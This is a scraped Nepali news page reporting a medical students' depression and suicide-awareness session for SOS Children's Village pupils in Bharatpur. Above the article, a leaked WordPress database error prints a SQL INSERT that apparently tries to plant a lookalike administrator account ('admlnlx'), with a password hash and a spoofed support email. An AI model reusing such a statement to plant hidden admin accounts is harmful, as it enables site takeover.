WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx6ZETxGugRoTD8xP/.XPGVHctDjSO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:16:21', '', 'admlnlx', 'admlnlx')
चितवन, फागुन २–
चिकित्सा विज्ञानका विद्यार्थीहरुको संस्था ह्वाईट कोटले भरतपुरको एसओएस बालग्रामका विद्यार्थीहरुलाई डिप्रेशन, आत्महत्या, तनावमुक्त हुने बारे जनचेताना मुलक कार्यक्रम गरेको छ ।
ह्वाइट कोट का अध्यक्ष आविस्कार चापागाइँ को संचालनमा भएको कार्यक्रममा कक्षा ११ र १२ का ८२ जना विद्यार्थीहरु सहभागि थिए । सो कार्यक्रममा डा.शशांक सिंह, सुचिता आचार्य, निरुता बराल, सचिन सापकोटा, अजित सापकोटाले विद्यार्थीहरुलाई प्रशिक्षण दिएका थिए । बिशाल भण्डारिको संयोजकतामा रहेर पछिल्लो समय युवाहरु डिप्रेशनमा पर्ने र आत्महत्यासम्मका अवस्थामा पुग्ने भएकाले यसलाई रोक्नका लागि विभिन्न रोचक तरिकाबाट शिक्षक तथा विद्यार्थीहरुलाई जानकारी प्रदान गरिएको डा.शशांक सिंहले बताउनुभयो ।कार्यक्रमका स्कूलका प्राचार्य सुरेन्द्र अम्गाई, सह–प्राचार्य लक्ष्मण भण्डारी, ह्वाईट कोटका सल्लाहकार डा.शशांक सिंह, आईडिया भट्टीका सचिनजंग कार्की,प्रजित खतिवडा, प्रोग्रेस शर्मा, बिपिन क्षेत्रि, बिबेक खड्का, बिबेक क्षेत्रिलगायतको सहभागिता रहेको थियो ।